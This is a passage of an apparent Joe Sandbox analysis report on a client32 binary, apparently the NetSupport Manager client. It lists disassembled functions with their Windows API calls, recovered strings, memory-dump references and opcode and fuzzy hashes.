                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                              • Opcode ID: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                                                                              • Instruction ID: a1ea6c524cc80d8162a63b7122f67c86dce844b07e1b6a5dabb7ffb63b15338b
                                                                                                                              • Opcode Fuzzy Hash: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                                                                              • Instruction Fuzzy Hash: F001A175541B029FE7218FA9C844749FBE0AF51319F10890ED4A657B90CBB1A640CF11
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadMenuA.USER32 ref: 1100339D
                                                                                                                              • GetSubMenu.USER32 ref: 110033C3
                                                                                                                              • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                              • API String ID: 468487828-934300333
                                                                                                                              • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                              • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                                              • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                              • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadMenuA.USER32 ref: 1100348D
                                                                                                                              • GetSubMenu.USER32 ref: 110034B3
                                                                                                                              • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                              • API String ID: 468487828-934300333
                                                                                                                              • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                              • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                                                              • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                              • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11016410 Relevance: 9.1, APIs: 6, Instructions: 80windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutA.USER32(?,0000007F,00000000,00000000,00000002,000001F4,?), ref: 11016442
                                                                                                                              • GetClassLongA.USER32 ref: 1101645E
                                                                                                                              • CopyIcon.USER32 ref: 11016469
                                                                                                                              • SendMessageTimeoutA.USER32(?,0000007F,00000001,00000000,00000002,000001F4,00000000), ref: 1101648F
                                                                                                                              • GetClassLongA.USER32 ref: 1101649F
                                                                                                                              • CopyImage.USER32 ref: 110164B9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassCopyLongMessageSendTimeout$IconImage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1346719093-0
                                                                                                                              • Opcode ID: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
                                                                                                                              • Instruction ID: 52e36b3cc5b4867ec12e27719debc037fef8f2d782e630a2d27beabddd169e4c
                                                                                                                              • Opcode Fuzzy Hash: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
                                                                                                                              • Instruction Fuzzy Hash: 7F110AB1BD12297BFB048A65CD46FBE739CDB85765F004269F524EA0C4EBF599004760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageA.USER32 ref: 110275D2
                                                                                                                              • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                                                              • PostThreadMessageA.USER32 ref: 110275F7
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                                                              • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2375713580-0
                                                                                                                              • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                              • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                                                              • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                              • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 111715AE
                                                                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                              • __amsg_exit.LIBCMT ref: 111715CE
                                                                                                                              • __lock.LIBCMT ref: 111715DE
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                                                              • _free.LIBCMT ref: 1117160E
                                                                                                                              • InterlockedIncrement.KERNEL32(02721660), ref: 11171626
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3470314060-0
                                                                                                                              • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                                              • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                                                              • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                                              • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11002590 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectSelect$LineMove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 359220273-0
                                                                                                                              • Opcode ID: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                                                                              • Instruction ID: 21f229d1c7d8c8dc4b4b16be7dffbf2429469ae1aeee6a23e1c2fe7cad82a0fa
                                                                                                                              • Opcode Fuzzy Hash: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                                                                              • Instruction Fuzzy Hash: CA012876201128BFD704DB95DD84DABF7ACFF89210B108256FD2883640D770AD018BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11146370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: %s: $CLIENT32
                                                                                                                              • API String ID: 4139908857-407627211
                                                                                                                              • Opcode ID: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                                                                              • Instruction ID: af445439b6752a8968c272d87336ee6d3db593790a582df571d11f25a3ee04be
                                                                                                                              • Opcode Fuzzy Hash: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                                                                              • Instruction Fuzzy Hash: C241493550016ADBCB11CF24DC58AEEFBB9EF4630DF1486A4E82987680DB71964DCF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MapWindowPoints.USER32 ref: 110773FB
                                                                                                                                • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                                              • EqualRect.USER32 ref: 1107740C
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 11077447
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$DeferEqualPointsRect
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2754115966-2830328467
                                                                                                                              • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                              • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                                                              • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                              • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11110530 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(?,30AC22AD,?,?), ref: 11110564
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1111059E
                                                                                                                              • SetEvent.KERNEL32(?), ref: 111105C9
                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 11110604
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                                              • String ID: list<T> too long
                                                                                                                              • API String ID: 930337060-4027344264
                                                                                                                              • Opcode ID: c4b0cbd5b9083972ca6b0d7ec84c7c2e81a93cff3e299c99045f2fa03ae69198
                                                                                                                              • Instruction ID: 7bfaceea9a20e34aca0a829f3d9254b0af8797b3eeddb6bd678ff8280e03d006
                                                                                                                              • Opcode Fuzzy Hash: c4b0cbd5b9083972ca6b0d7ec84c7c2e81a93cff3e299c99045f2fa03ae69198
                                                                                                                              • Instruction Fuzzy Hash: C6314175A047059FD714CF64C984B56FBF9FB49314F10862EE8569BA44DB30F844CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
